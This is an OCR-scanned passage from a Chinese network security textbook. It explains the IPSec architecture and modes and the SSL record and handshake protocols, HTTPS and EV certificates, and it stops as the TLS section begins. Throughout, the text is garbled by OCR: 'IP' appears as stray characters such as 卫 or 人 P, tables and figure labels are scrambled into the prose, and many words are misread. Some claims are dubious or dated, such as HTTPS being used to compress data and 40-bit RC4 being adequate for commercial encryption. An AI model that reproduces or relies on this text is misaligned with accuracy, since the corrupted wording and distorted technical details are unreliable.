结构 、 组 件 及 各 组 件 间 的 相互 关系 。 


V 
封装 安全 雪 符 验证 头 (AH) 
2 — ， 

jn 算法 | | 加 窗 算 法 

TY Y 
> 解释 域 (DOD) < 
A 
密 负 管理。 |< 策略 


A 


图 4.3 IPSec 的 体系 结构 

1.AH 和 ESP 

AH 和 ESP 是 IPSec 体系 中 的 主体 ， 其 中 定义 了 协议 的 载荷 头 格式 以 及 它们 所 能 提供 
的 服务 ， 另 外 还 定义 了 数据 报 的 处 理 规则 ， 正 是 这 两 个 安全 协议 为 数据 报 提 供 了 网 络 层 的 
安全 服务 。 两 个 协议 在 处 理 数据 报 文 时 都 需要 根据 确定 的 数据 变换 算法 来 对 数据 进行 转 
换 ， 以 确保 数据 的 安全 ， 其 中 包括 算法 、 密 钥 大 小 、 算 法 程序 以 及 算法 专用 的 任何 信息 。 

2.IKE 

IKE 利用 ISAKMP 语言 来 定义 密 钥 交换 ， 是 对 安全 服务 进行 协商 的 手段 。IKE 交换 的 
最 终结 果 是 一 个 通过 验证 的 密 钥 以 及 建立 在 通信 双方 同意 基础 上 的 安全 服务 ， 即 IPSec 安 
全 关联 。 
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3. SA 

SA 是 一 套 专 门将 安全 服务 / 密 钥 和 需要 保护 的 通信 数据 联系 起 来 的 方案 。 它 保证 了 
IPSec 数据 报 封装 及 提取 的 正确 性 ， 同 时 将 远程 通信 实体 和 要 求 交换 密 钥 的 IPSec 数据 传输 
联系 起 来 ， 即 SA 解决 的 是 如 何 保护 通信 数据 、 保 护 什 么 样 的 通信 数据 以 及 由 谁 来 实行 保 
护 的 问题 。 


4.2.3 IPSec 策略 和 服务 


IPSec 策略 由 几 个 组 件 组 成 ， 这 些 组 件 用 于 实施 组 织 的 IPSec 安全 要 求 。 图 4.4 描绘 了 
IPSec 策略 的 各 种 组 件 以 及 它们 之 间 如 何 关 联 。 


< 一 


4.4 IPSec 策略 


IPSec 策略 充当 一 套 规则 的 容器 ， 这 些 规则 确定 将 允许 哪些 网 络 通信 流 以 及 如 何 允 
许 。 每 条 规则 由 一 个 筛选 器 列表 和 一 个 关联 操作 组 成 。 筛 选 器 列表 包含 一 组 筛选 器 。 当 通 
信 流 与 特定 筛选 器 匹配 时 ， 将 触发 关联 的 筛选 器 操作 。 另 外 ， 规 则 还 定义 在 主机 之 间 使 用 
哪些 身份 验证 方法 。 图 4.4 以 从 上 往 下 的 方式 描绘 了 策略 组 件 。 但 是 ， 建 立 策略 最 有 效 的 
方法 是 从 筛选 器 和 筛选 器 列表 开始 ， 因 为 它们 是 控制 保护 哪个 通信 流 的 基础 构造 块 。 可 忆 
看 到 一 个 IPSec 策略 的 大 体 构 成 情况 : 由 一 个 或 多 个 筛选 器 构成 一 个 筛选 器 列表 ， 对 于 每 
一 个 筛选 器 列表 都 有 且 只 有 一 个 筛选 器 操作 与 之 对 应 ， 这 种 一 一 对 应 的 关系 就 是 IPSec 策 
略 的 一 个 规则 ， 一 或 多 个 规则 便 构 成 了 一 个 完整 的 卫 Sec 策略 。 当 一 个 通信 请 求 产生 时 ， 
请 求 方 与 被 请 求 方 的 他 协议 、 端 口 等 信息 将 与 筛选 器 列表 中 的 筛选 器 逐一 进行 比照 ， 如 果 
与 某 筛选 器 相符 合 ， 则 由 IPSec 策略 执行 与 该 筛选 器 列表 对 应 的 筛选 器 操作 。 由 此 可 见 ， 


(oN. 


i PE 计算 机 网 络 信息 安全 (第 2 版) 


在 配置 IPSec 策略 时 所 需 的 工作 就 是 一 一 配置 筛选 器 列表 ， 并 为 每 个 列表 指定 一 个 筛选 器 
操作 。 

筛选 器 是 IPSec 策略 最 重要 的 组 成 部 分 。 如 果 未 在 客户 端 策略 或 服务 器 策略 中 指定 正 
确 的 筛选 器 ， 或 者 如 果 IP 地 址 已 更 改 ， 但 该 策略 的 筛选 器 却 未 更 新 ， 则 安全 性 就 会 得 不 到 
保障 。IPSec 筛选 器 被 插入 到 计算 机 上 的 TCP/IP 网 络 协议 堆栈 的 他 层 ， 因 此 这 些 筛选 器 
可 以 对 所 有 入 站 或 出 站 人 P 数据 包 进 行 检 查 (筛选 )。 除 了 稍 有 延迟 之 外 (在 两 台 计算 机 之 间 协 
商 安全 性 关系 必然 引起 延迟 )，IPSec 对 于 最 终 用 户 应 用 程序 和 操作 系统 服务 来 说 是 透明 
的 。 筛 选 器 依据 IPSec 策略 中 的 安全 性 规则 与 相应 的 筛选 器 操作 相关 联 。Windows IPSec 
同时 支持 将 IPSec 隧道 模式 和 IPSec 传输 模式 用 作 此 规则 的 选项 。IPSec 隧道 模式 规则 的 
配置 与 IPSec 传输 模式 规则 的 配置 有 很 大 差异 。 

与 IPSec 策略 相关 联 的 筛选 规则 与 防火 墙 规则 类 似 。 通 过 使 用 卫 安全 策略 管理 
Microsoft 管理 控制 台 (MMC) 管 理 单元 提供 的 图 形 用 户 界面 (GUD， 可 以 将 IPSec 配置 为 根 
据 源 与 目标 地 址 组 合 以 及 特定 协议 和 端口 来 允许 或 阻止 特定 类 型 的 通信 流 。 


4.2.4 IPSec 的 工作 模式 


IPSec 有 两 种 工作 模式 ， 分 别 是 传输 模式 (Transport) 和 隧道 (Tunnel) 模 式 。 在 这 两 种 模 
式 下 ， 分 别 可 以 使 用 AH 头 (IPSec 认证 头 ) 或 ESP 头 (IPSec ESP 封装 安全 负荷 头 ) 两 种 方式 
进行 安全 封装 ， 各 种 工作 模式 下 的 认证 和 加 密 原理 如 下 。 


1. 传输 模式 的 认证 


传输 模式 只 对 IP 数据 包 的 有 效 负载 进行 认证 。 此 时 ， 继 续 使 用 以 前 的 人 P 头 部 ， 只 对 
了 头 部 的 部 分 域 进行 修改 ， 而 IPSec 协议 头 部 插入 到 IP 头 部 和 传输 层 头 部 之 间 。 


2. 隧道 模式 的 认证 


隧道 模式 对 整个 人 P 数据 包 进 行 认证 。 此 时 ， 需 要 新 产生 一 个 了 头 部 ，IPSec 头 部 被 放 
在 新 产生 的 他 头 部 和 以 前 的 下 数据 包 之 间 ， 从 而 组 成 一 个 新 的 下 头 部 。 


3. 传输 模式 的 加 密 

传输 模式 只 对 IP 数据 包 的 有 效 负载 进行 加 密 。 此 时 ， 继 续 使 用 以 前 的 人 P 头 部 ， 只 对 
IP 头 部 的 部 分 域 进行 修改 ， 而 IPSec 协议 头 部 插入 到 IP 头 部 和 传输 层 头 部 之 间 。 

4. 隧道 模式 的 加 密 


隧道 模式 对 整个 耳 数据 包 进行 加 密 。 此 时 ， 需 要 新 产生 一 个 人 P 头 部 ，IPSec 头 部 被 放 
在 新 产生 的 他 头 部 和 以 前 的 四 数据 包 之 间 ， 从 而 组 成 一 个 新 的 下 头 部 。 
在 Tunnel 和 Transport 模式 下 的 数据 封装 形式 如 表 4.1 所 示 。 
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表 4.1 在 Tunnel 和 Transport 模式 下 的 数据 封装 


Transport Tunnel 


tp |Esp [ 壤 | asex | [we [Esp [we data | EsP-T | 


[ss 
[eel 
T 


卫 | data | EsPp-T | 


表 4.1 中 ，data 为 原 卫 报 文 。 两 者 的 区 别 在 于 IP 数据 报 的 ESP 负载 部 分 的 内 容 不 
同 。 在 隧道 模式 中 ， 整 个 IP 数据 报 都 在 ESP 负载 中 进行 封装 和 加 密 。 当 这 完成 以 后 ， 真 
正 的 IP 源 地 址 和 目的 地 址 都 可 以 被 隐藏 为 mtemet 发 送 的 普通 数据 。 这 种 模式 的 一 种 典型 
用 法 就 是 在 防火 墙 与 防火 墙 之 间 通 过 虚拟 专用 网 的 连接 时 进行 的 主机 或 拓扑 隐藏 。 在 传输 
模式 中 ， 只 有 更 高 层 协议 帧 (TCP、UDP、ICMP 等 ) 被 放 到 加 密 后 的 IP 数据 报 的 ESP 负载 
部 分 。 在 这 种 模式 中 ， 源 他 和 目的 他 地 址 以 及 所 有 的 下 包头 域 都 是 不 加 密 发 送 的 。 


4.3 SSL 安全 协议 


IP | AH [se | aata | zspr | [we | an [Esp 


4.3.1 SSL 概述 


SSL 又 称 为 安全 套 接 层 ， 是 Netscape 公司 开发 的 协议 ， 可 对 万 维 网 客户 与 服务 器 之 间 
传送 的 数据 进行 加 密 和 鉴别 。 它 在 双方 的 联络 阶段 协商 将 使 用 的 加 密 算 法 (如 用 DES 或 
RSA) 和 密 钥 ， 以 及 客户 与 服务 器 之 间 的 鉴别 。 在 联络 阶段 完成 之 后 ， 所 有 传送 的 数据 都 使 
用 在 联络 阶段 商定 的 会 话 密 钥 。SSL 不 仅 被 所 有 常用 的 浏览 器 和 万 维 网 服务 器 所 支持 ， 而 
且 也 是 运输 层 安全 (Transport Layer Security，TLS) 协 议 的 基础 [RFC 2246]。 相 对 于 IPSec 
VPN 解决 方案 ，SSL VPN 的 特点 是 可 以 对 用 户 权限 进行 控制 (角色 授权 )， 并 且 控 制 了 网 络 
资源 的 访问 级 别 。 例 如 ， 可 以 允许 属于 A 角色 的 用 户 访问 某 些 资源 ， 同 时 允许 属于 B 角色 
的 用 户 访问 另 一 些 资源 。 除 了 上 述 优点 ，SSL B/S 服务 提供 了 一 种 无 客户 端的 安全 沪 问 方 
式 ， 这 满足 了 不 希望 在 终端 安装 客户 端 软件 用 户 的 需求 。 

SSL 和 TLS 并 不 仅 限 于 万 维 网 的 应 用 ， 它 们 还 可 用 于 IMAP 邮件 存 取 的 鉴别 和 数据 加 
密 。SSL 可 看 成 是 在 应 用 层 和 运输 层 之 间 的 一 个 层 ， 见 图 4.5。 在 发 送 方 ，SSL 接收 应 月 
层 的 数据 (如 HITP 或 IMAP 报 文 )， 对 数据 进行 加 密 ， 然 后 将 加 了 密 的 数据 送 往 TCP 插 
。 在 接收 方 ，SSL 从 TCP 插口 读 取 数 据 ， 解 密 后 将 数据 交 给 应 用 层 。 
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HTTP IMAP 
SSL 功能 标准 插口 


TCR 


4.5 安全 插口 层 SSL 的 位 置 


下 面 通过 一 个 简单 的 例子 说 明 SSL 的 工作 原理 。 

假定 A 有 一 个 使 用 SSL 的 安全 网 页 。B 上 网 时 用 鼠标 单 击 到 这 个 安全 网 页 的 链接 (这 
种 安全 网 页 的 URL 的 协议 部 分 不 是 HITP 而 是 HTTPS)。 接 着 ， 服 务 器 和 浏览 器 就 进行 握 
手 协议 ， 其 主要 过 程 如 下 。 

(1) 浏览 器 向 服务 器 发 送 浏 览 器 的 SSL 版 本 号 和 密码 编码 的 参数 选择 (Preference)( 因 为 
浏览 器 和 服务 器 要 协商 使 用 哪 一 种 对 称 密 钥 算 法 )。 

(2) 服务 器 向 浏览 器 发 送 服务 器 的 SSL 版 本 号 、 密 码 编码 的 参数 选择 及 服务 器 的 证 
书 。 证 书包 括 服务 器 的 RSA 公开 密 钥 。 此 证 书 用 某 个 认证 中 心 的 私有 密 钥 加 密 。 

(3) 浏览 器 有 一 个 可 信赖 的 CA 表 ， 表 中 有 每 一 个 CA 的 公开 密 钥 。 当 浏览 器 收 到 服 
务 器 发 来 的 证 书 时 ， 就 检查 此 证 书 是 否 在 自己 的 可 信赖 的 CA 表 中 。 如 不 在 ， 则 后 面 的 加 
密 和 鉴别 连接 就 不 能 进行 下 去 。 如 在 ， 则 浏览 器 就 使 用 CA 的 公开 密 钥 对 证 书 解密 ， 这 样 
就 得 到 了 服务 器 的 公开 密 钥 。 

(4) 浏览 器 随机 地 产生 一 个 对 称 会 话 密 钥 ， 并 用 服务 器 的 公开 密 钥 加 密 ， 然 后 将 加 密 
的 会 话 密 钥 发 送 给 服务 器 。 

(5) 浏览 器 向 服务 器 发 送 一 个 报 文 ， 说 明 以 后 浏览 器 将 使 用 此 会 话 密 钥 进 行 加 密 。 然 
后 浏览 器 再 向 服务 器 发 送 一 个 单独 的 加 密 报 文 ， 表 明 浏 览 器 端的 握手 过 程 已 经 完成 。 

(6) 服务 器 也 向 浏览 器 发 送 一 个 报 文 ， 说 明 以 后 服务 器 将 使 用 此 会 话 密 钥 进行 加 密 。 
然后 服务 器 再 向 浏览 器 发 送 一 个 单独 的 加 密 报 文 ， 表 明 服 务 器 端的 握手 过 程 已 经 完成 。 

(7) SSL 的 握手 过 程 至 此 已 经 完成 ， 下 面 就 可 开始 SSL 的 会 话 过 程 。 浏 览 器 和 服务 器 
都 使 用 这 个 会 话 密 钥 对 所 发 送 的 报 文 进行 加 密 。 

由 于 SSL 简单 且 开发 得 较 早 ， 因 此 目前 在 Intemet 商务 中 使 用 得 比较 广泛 。 但 SSL 并 
非 专门 为 信用 卡 交易 而 设计 的 ， 它 只 是 在 客户 与 服务 器 之 间 提 供 了 一 般 的 安全 通信 。SSL 
还 缺少 一 些 措施 以 防止 在 Internet 商务 中 出 现 各 种 可 能 的 欺骗 行为 。 

此 外 ，SSL 可 满足 的 安全 要 求 如 下 。 


可 
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1. 消息 完整 性 
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通过 HMAC( 通 过 密 钥 、 两 个 字符 串 和 数据 为 输入 参数 的 MD5 或 SHA-1) 来 校 验 消息 


是 否 完整 、 没 有 被 算 改 。 人 允许 上 


户 证 实 服务 器 的 身份 。 具 有 SSL 功能 的 浏览 器 维持 一 个 


表 ， 上 面 有 一 些 可 信赖 的 认证 中 心 (Certificate Authority，CA) 和 它们 的 公开 密 钥 。 当 浏览 器 
要 和 一 个 具有 SSL 功能 的 服务 器 进行 商务 活动 时 ， 浏 览 器 就 从 服务 器 得 到 含有 服务 器 的 公 
开 密 钥 的 证 书 。 此 证 书 是 由 某 个 认证 中 心 CA 发 出 的 (此 CA 在 客户 的 表 中 )， 这 就 使 得 客 


户 在 提交 其 
2. 加 密 的 SSL 会 话 


客户 和 
有 无 窃听 传送 数据 的 功能 。 


信用 卡 之 前 能 够 鉴别 服务 器 的 身份 。 


服务 器 交互 的 所 有 数据 都 在 发 送 方 加 密 ， 在 接收 方 解 密 。SSL 还 有 检测 攻击 者 
为 保证 数据 的 机 密 性 ， 需 要 对 数据 进行 加 密 ， 支 持 的 加 密 算法 


有 RC4、DES、3DES、AES、RSA 和 DSA。 对 于 加 密 算法 的 支持 ， 不 同 的 SSL 版 本 存在 
差异 ， 图 4.6 是 SSL 变种 的 谱系 树 。 所 有 IETF 版 本 之 前 的 SSL 版 本 都 是 由 网 景 通信 公司 
(Netscape Communications) 的 工程 师 设计 的 。 尽 管 RSA 是 目前 SSLv2 和 SSLv3 实现 所 支 


持 的 占 主导 地 位 的 公 月 


DSS( 数 字 签名 标准 ) 和 DH(Diffie-Hellman)。EC( 帆 


密 钥 算法 ， 但 SSLv3 还 支持 许多 其 他 算法 的 加 密 套 件 ， 特 别 是 


曲线 ) 算 法 将 DH 和 DSS 上 


蔡 换 为 由 一 条 椭圆 曲线 上 的 点 所 构成 的 域 ， 该 算法 更 加 安全 并 且 密 钥 操 作 更 快 ， 


果 EC 可 以 被 标准 化 ， 它 将 取代 DSS 和 DH。 


PCT(1995) 只 进行 
认证 的 模式 再 握 
手 证 书 链 


STLP(1996) 共 享 密 
钥 认 证 数据 及 一 些 
性 能 上 的 优化 


se | 


> 0 


WTLS(1998)WAP 
论坛 对 无 线 协议 的 支持 


SSLv1(1994) 
未 发 布 


SSLv2(1994) 
第 一 版 


SSLv3(1995) 
只 进行 认证 的 模式 
DH、DSS 关 闭 握手 
再 握手 证 书 链 


TLS(1997—1999) 
IETF 必 须 支 持 DH、 
DSS 新 的 MAC 算 法 
新 的 密 钥 扩展 


图 4.6 SSL 变种 的 谱系 树 


hp 的 素数 域 
因此 ， 如 
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3. SSL 客户 鉴别 

允许 服务 器 证 实 客户 的 身份 。 这 个 信息 对 服务 器 是 很 重要 的 。 例 如 ， 当 银行 将 保密 的 
有 关 财 务 信息 发 送 给 某 顾客 时 ， 就 必须 检验 接收 者 的 身份 。 
4.3.2 SSL 体系 结构 


SSL 的 体系 结构 中 包含 两 个 协议 子 层 : 底层 是 SSL 记录 协议 层 (SSL Record Protocol 
Layer); 高 层 是 SSL 握手 协议 层 (SSL Hand Shake Protocol Layer)。SSL 的 协议 栈 如 图 4.7 
所 示 。 


使 用 SSL 


4.7 ”SSL 的 协议 栈 


SSL 记录 协议 层 的 作用 是 为 高 层 协议 提供 基本 的 安全 服务 。SSL 记录 协议 针对 HTTP 
协议 进行 了 特别 的 设计 ， 使 得 超 文本 的 传输 协议 HITP 能 够 在 SSL 运行 。 记 录 封 装 各 种 高 
层 协议 ， 具 体 实施 压缩 解压 缩 、 加 密 解 密 、 计 算 和 校 验 MAC 等 与 安全 有 关 的 操作 。 

SSL 握手 协议 层 包 括 SSL 握手 协议 (SSL Hand Shake Protocol)、SSL 密码 参数 修改 协议 
(SSL Change Cipher Spec Protocol)、 应 用 数据 协议 (Application Data Protocol) 和 SSL 告警 协 
议 (SSL Alert Protocol)。 握 手 层 的 这 些 协议 用 于 SSL 管理 信息 的 交换 ， 人 允许 应 用 协议 传送 
数据 之 间 相 互 验证 、 协 商 加 密 算法 和 生成 密 钥 等 。SSL 握手 协议 的 作用 是 协调 客户 和 服务 
器 的 状态 ， 使 双方 能 够 达到 状态 的 同步 。 


4.3.3 SSL 协议 及 其 安全 性 分 析 


1. SSL 记录 协议 

SSL 记录 协议 为 SSL 连接 提供 两 种 服务 ， 即 机 密 性 和 报 文 完整 性 。 

在 SSL 协议 中 ， 所 有 的 传输 数据 都 被 封装 在 记录 中 。 记 录 是 由 记录 头 和 记录 数据 (长 
度 不 为 0) 组 成 的 。 所 有 的 SSL 通信 都 使 用 SSL 记录 层 ， 记 录 协 议 封 装 上 层 的 握手 协议 、 
报警 协议 、 修 改 密 文 协议 。SSL 记录 协议 包括 记录 头 和 记录 数据 格式 的 规定 。 

SSL 记录 协议 定义 了 要 传输 数据 的 格式 ， 它 位 于 一 些 可 靠 的 传输 协议 之 上 (如 TCP)， 
用 于 各 种 更 高 层 协议 的 封装 。 主 要 完成 分 组 和 组 合 、 压 缩 和 解压 缩 以 及 消息 认证 和 加 密 等 。 

SSL 记录 协议 主要 操作 流程 如 图 4.8 所 示 。 图 中 的 5 个 操作 简单 介绍 如 下 。 
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交付 TCP 
4.8 ”SSL 记录 协议 的 操作 流程 


(1) 每 个 上 层 应 用 数据 被 分 成 214B 或 更 小 的 数据 块 。 记 录 中 包含 类 型 、 版 本 号 、 长 度 


和 数据 字段 。 

(2) 压缩 是 可 选 的 ， 并 且 是 无 损 压缩 ， 压 缩 后 内 容 长 度 的 增加 不 能 超过 1024B。 

(3) 在 压缩 数据 上 计算 消息 认证 MAC。 

(4) 对 压缩 数据 及 MAC 进行 加 密 。 

(5) 增加 SSL 记录 。 

SSL 记录 协议 字段 结构 主要 由 内 容 类 型 、 主 要 版 本 、 次 要 版 本 、 压 缩 长 度 组 成 ， 简 介 
如 下 。 

(1) 内 容 类 型 (8 位 ): 封装 的 高 层 协议 。 

(2) 主要 版 本 (8 位 ): 使 用 的 SSL 主要 版 本 。 对 于 SSL v3 已 经 定义 的 内 容 类 型 是 握手 
协议 、 警 告 协议 、 改 变 密码 格式 协议 和 应 用 数据 协议 。 

(3) 次 要 版 本 (8 位 ): 使 用 的 SSL 次 要 版 本 。 对 于 SSL V3.0， 值 为 0。 

(4) 压缩 长 度 (16 位 ): 明文 数据 (如 果 选 用 压缩 则 是 压缩 数据 ) 以 字 节 为 单位 的 长 度 。 

2. SSL 报警 协议 

SSL 报警 协议 是 用 来 为 对 等 实体 传递 SSL 的 相关 警告 。 如 果 在 通信 过 程 中 某 一 方 发 现 
任何 异常 ， 就 需要 给 对 方 发 送 一 条 警示 消息 通告 。 警 示 消 息 有 以 下 两 种 。 

(1) Fatal 错误 。 一 旦 收 到 该 级 别 的 警示 消息 ， 就 必须 终止 连接 而 且 不 能 再 重用 该 会 
话 ， 或 者 忽略 该 警告 消息 。 然 而 实现 也 可 以 选择 视 警告 为 致命 的 。 

(2) Warming 消息 。 通 信 双 方 通常 都 只 是 记录 日 志 ， 而 对 通信 过 程 不 造成 任何 影响 。 
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SSL 握手 协议 可 以 使 得 服务 器 和 客户 能 够 相互 鉴别 对 方 ， 协 商 具体 的 加 密 算 法 和 MAC 算 
法 以 及 保密 密 钥 ， 用 来 保护 在 SSL 记录 中 发 送 的 数据 。 


3. SSL 修改 密 文 协议 


为 了 保障 SSL 传输 过 程 的 安全 性 ， 客 户 端 和 服务 器 双方 应 该 每 隔 一 段 时 间 改 变 加 密 规 


范 。 所 以 有 了 SSL 修改 密 文 协议 。SSL 修改 密 文 协议 是 3 个 高 层 的 特定 协议 之 一 ， 也 是 其 
中 最 简单 的 一 个 。 在 客户 端 和 服务 器 完成 握手 协议 之 后 ， 它 需要 向 对 方 发 送 相关 消息 (该 


息 只 包含 一 个 值 为 1 的 单字 节 )， 通 知 对 方 随后 的 数据 将 用 刚刚 协商 的 密码 规范 算法 和 关 
的 密 钥 处 理 ， 并 负责 协调 本 方 模块 按照 协商 的 算法 和 密 钥 工作 。 


4. SSL 握手 协议 


首 


SSL 握手 协议 被 封装 在 记录 协议 中 ， 该 协议 允许 服务 器 与 客户 机 在 应 用 程序 传输 和 接 
收 数据 之 前 互相 认证 、 协 商 加 密 算法 和 密 钥 。 在 初次 建立 SSL 连接 时 ， 服 务 器 与 客户 机 交 


换 一 系列 消息 。 


这 些 消息 交换 能 够 实现 以 下 操作 。 
(1) 客户 机 认证 服务 器 。 

(2) 允许 客户 机 与 服务 器 选择 双方 都 支持 的 密码 算法 。 
(3) 可 选择 的 服务 器 认证 客户 。 

(4) 使 用 公 钥 加 密 技术 生成 共享 密 钥 。 
(5) 建立 加 密 SSL 连接 。 

SSL 握手 协议 报 文 头 包括 以 下 3 个 字段 。 
(1) 类 型 (1B): 该 字段 指明 使 用 的 SSL 握手 协议 报 文 类 型 。 
(2) 长 度 (3B): 以 字 节 为 单位 的 报 文 长 度 。 


(3) 内 容 ( 三 1B): 使 月 


SSL 握手 协议 的 报 文 类 型 如 表 4.2 所 示 。 
表 4.2 SSL 握手 协议 报 文 类 型 


报 文 类 型 
hello_request 


空 


参数 


client_ hello 版 本 、 随 机 数 、 会 话 DD、 密 文 徐 、 压 缩 方法 
server_hello 版 本 、 随 机 数 、 会 话 ID、 密 文 簇 、 压 缩 方 法 
certificate X.509v3 证 书 链 

Server key exchange 参数 、 签 名 

certificate_ request 类 型 、 授 权 

server done 守 

certificate_Verl 签名 

client key_exchange 参数 、 签 名 

finished Hash 值 
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SSL 握手 协议 过 程 如 下 。 

步骤 1: 建立 安全 能 

客户 机 向 服务 器 发 送 client hello 报 文 ， 服 务 器 向 客户 机 回应 server_ hello 报 文 。 建 立 
的 安全 属性 包括 协议 版 本 、 会 话 ID、 蜜 文秘、 压缩 方法 ， 同 时 生成 并 交换 用 于 防止 重 放 攻 
击 的 随机 数 。 密 文 簇 参数 包括 密 钥 交换 方法 (Deffie-Hellman 密 钥 交换 算法 、 基 于 RSA 的 密 
钥 交 换 和 另 一 种 实现 在 Fortezza chip 上 的 密 钥 交换 )、 加 密 算法 (DES、RC4、RC2、3DES 
等 )、MAC 算法 (MD5 或 SHA-1)、 加 密 类 型 ( 流 或 分 组 ) 等 内 容 。 
步骤 2: 认证 服务 器 和 密 钥 交换 
在 hello 报 文 之 后 ， 如 果 服 务 器 需要 被 认证 ， 服 务 器 将 发 送 其 证 书 。 如 果 需 要 ， 服 务 
器 还 要 发 送 server key_exchange; 然后 ， 服 务 器 可 以 向 客户 发 送 certificate_request 请 求证 
书 。 服 务 器 总 是 发 送 server hello _done 报 文 ， 指 示 服 务 器 的 hello 阶段 结束 。 
步骤 3: 认证 客户 和 密 钥 交换 

客户 一 旦 收 到 服务 器 的 server_hello_done 报 文 ， 客 户 将 检查 服务 器 证 书 的 合法 性 (如 果 
服务 器 要 求 )， 如 果 服 务 器 向 客户 请 求 了 证 书 ， 客 户 必 须发 送 客户 证 书 ， 然 后 发 送 
client key_exchange 报 文 ， 报 文 的 内 容 依赖 于 client_hello 与 server_hello 定义 的 密 钥 交换 的 
类 型 。 最 后 ， 客 户 可 能 发 送 client verify 报 文 来 校 验 客户 发 送 的 证 书 ， 这 个 报 文 只 能 在 具 
有 签名 作用 的 客户 证 书 之 后 发 送 。 

步骤 4: 结束 

客户 发 送 change_cipher spec 报 文 并 将 挂 起 的 CipherSpec 复制 到 当前 的 CipherSpec。 
这 个 报 文 使 用 的 是 修改 密 文 协议 。 然 后 ， 客 户 在 新 的 算法 、 对 称 密 铀 和 MAC 秘 文 之 下 立 
即 发 送 finished 报 文 。finished 报 文 验 证 密 钥 交换 和 鉴别 过 程 是 成 功 的 。 服 务 器 对 这 两 个 报 
文 响应 ， 发 送 自己 的 change_cipher_ spec 报 文 、finished 报 文 。 握 手 结束 ， 客 户 与 服务 器 可 
以 发 送 应 用 层 数据 了 。 

当 客 户 从 服务 器 端 传送 的 证 书 中 获得 相关 信息 时 ， 需 要 检查 以 下 内 容 来 完成 对 服务 器 
的 认证 。 

(1) 时 间 是 否 在 证 书 的 合法 期 限 内 。 

(2) 签发 证 书 的 机 关 是 否 为 客户 端 信任 的 。 

(3) 签发 证 书 的 公 钥 是 否 符合 签发 者 的 数字 签名 。 

(4) 证 书 中 的 服务 器 域名 是 否 符合 服务 器 自己 真正 的 域名 。 

服务 器 被 验证 成 功 后 ， 客 户 继续 进行 握手 过 程 。 

同样 地 ， 服 务 器 从 客户 传送 的 证 书 中 获得 相关 信息 认证 客户 的 身份 ， 需 要 检查 以 下 几 项 。 

(1) 用 户 的 公 钥 是 否 符合 用 户 的 数字 签名 。 

(2) 时 间 是 否 在 证 书 的 合法 期 限 内 。 

(3) 签发 证 书 的 机 关 是 否 为 服务 器 信任 的 。 

(4) 用 户 的 证 书 是 否 被 列 在 服务 器 的 LDAP 里 用 户 的 信息 中 。 

(5) 得 到 验证 的 用 户 是 否 仍然 有 权限 访问 请 求 的 服务 器 资源 。 
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4.3.4 SSL 的 应 用 实例 


1. 实例 1: HTTPS 


HTTPS(HyperText Transfer Protocol Secure， 安 全 超 文本 传输 协议 ) 是 由 Netscape 开发 
并 内 置 于 其 浏览 器 中 ， 用 于 对 数据 进行 压缩 和 解压 操作 ， 并 返回 网 络 上 传送 回 的 结果 。 
HTTPS 实际 上 应 用 了 Netscape 的 安全 套 接 字 层 (SSL) 作 为 HTTP 应 用 层 的 子 层 (HTTPS 使 
用 端口 443， 而 不 是 像 HTTP 那样 使 用 端口 80 来 和 TCP/IP 进行 通信 )。SSL 使 用 40 位 关 
键 字 作为 RC4 流 加 密 算法 ， 这 对 于 商业 信息 的 加 密 是 合适 的 。HTTPS 和 SSL 支持 使 
X.509 数字 认证 ， 如 果 需 要 用 户 可 以 确认 发 送 者 是 谁 。 

HTTPS 是 以 安全 为 目标 的 HTTP 通道 ， 简 单 地 讲 ， 是 HTTP 的 安全 版 ， 即 HTTP 下 加 
入 SSL 层 ，HTTPS 的 安全 基础 是 SSL。 它 是 一 个 URI Scheme( 抽 象 标识 符 体 系 )， 句 法 类 
同 http: 体 系 。 用 于 安全 的 HTTP 数据 传输 。https:URL 表明 它 使 用 了 HTTP, 但 HITPS 存 
在 不 同 于 HTTP 的 默认 端口 及 一 个 加 密 / 身 份 验证 层 (在 HTTP 与 TCP 之 间 )。 这 个 系统 的 最 
初 研发 由 网 景 公司 进行 ， 提 供 了 身份 验证 与 加 密 通信 方法 ， 它 被 广泛 用 于 万 维 网 上 安全 敏 
感 的 通信 ， 如 交易 支付 方面 。 
限制 : 一 种 常见 的 误解 是 : “银行 用 户 在 线 使 用 https: 就 能 充分 彻底 保障 他 们 的 银行 
卡号 不 被 偷窃 。” 实 际 上 ， 与 服务 器 的 加 密 连 接 中 能 保护 银行 卡号 的 部 分 ， 只 有 用 户 到 服 
务 器 之 间 的 连接 及 服务 器 自身 。 并 不 能 绝对 确保 服务 器 自己 是 安全 的 ， 这 点 甚至 已 被 攻击 
者 利用 ， 常 见 例子 是 模仿 银行 域名 的 钓鱼 攻击 。 少 数 罕 见 攻击 在 网 站 传输 客户 数据 时 发 
生 ， 攻 击 者 尝试 在 传输 中 窃听 数据 。 

人 们 期 望 商业 网 站 迅速 且 尽 早 引 入 新 的 特殊 处 理 程序 到 金融 网 关 ， 仅 保留 传输 码 
(Transaction Number)。 不 过 他 们 常常 存储 银行 卡号 在 同一 个 数据 库 里 。 那 些 数据 库 和 服务 
器 少数 情况 有 可 能 被 未 授权 用 户 攻 击 和 损害 。 

2. 实例 2: 扩展 验证 (EV)SSL 证 书 

Extended Validation SSL Certificates 翻译 为 中 文 为 “扩展 验证 (EV)SSL 证 书 ”， 该 证 书 
经 过 最 彻底 的 身份 验证 ， 确 保证 书 持 有 组 织 的 真实 性 。 独 有 的 绿色 地 址 栏 将 循环 显示 组 织 
名 称 和 作为 CA 的 GlobalSign 名 称 ， 从 而 最 大 限度 地 确保 网 站 的 安全 性 ， 树 立 网 站 可 信 形 
象 ， 不 给 欺诈 钓鱼 网 站 以 可 乘 之 机 。 

对 线 上 购物 者 来 说 ， 绿 色 地 址 栏 是 验证 网 站 身份 及 安全 性 的 最 简便 、 可 靠 的 方式 。 在 
IE 7.0、FireFox 3.0、Opera 9.5 等 新 一 代 高 安全 浏览 器 下 ， 使 用 扩展 验证 (EV)SSL 证 书 的 网 
站 的 浏览 器 地 址 栏 会 自动 呈现 绿色 ， 从 而 清晰 地 告诉 用 户 正 在 访问 的 网 站 是 经 过 严格 认证 
的 。 此 外 ， 绿 色 地 址 栏 邻近 的 区 域 还 会 显示 网 站 所 有 者 的 名 称 和 颁发 证 书 CA 机 构 名称 ， 
这 些 均 向 客户 传递 同一 信息 ， 该 网 站 身份 可 信 ， 信 息 传递 安全 可 靠 ， 而 非 钓鱼 网 站 。 


4.4 TLS 协议 


安全 传输 层 协议 (Transport Layer Security，TLS) 用 于 在 两 个 通信 应 用 程序 之 间 提 供 保 
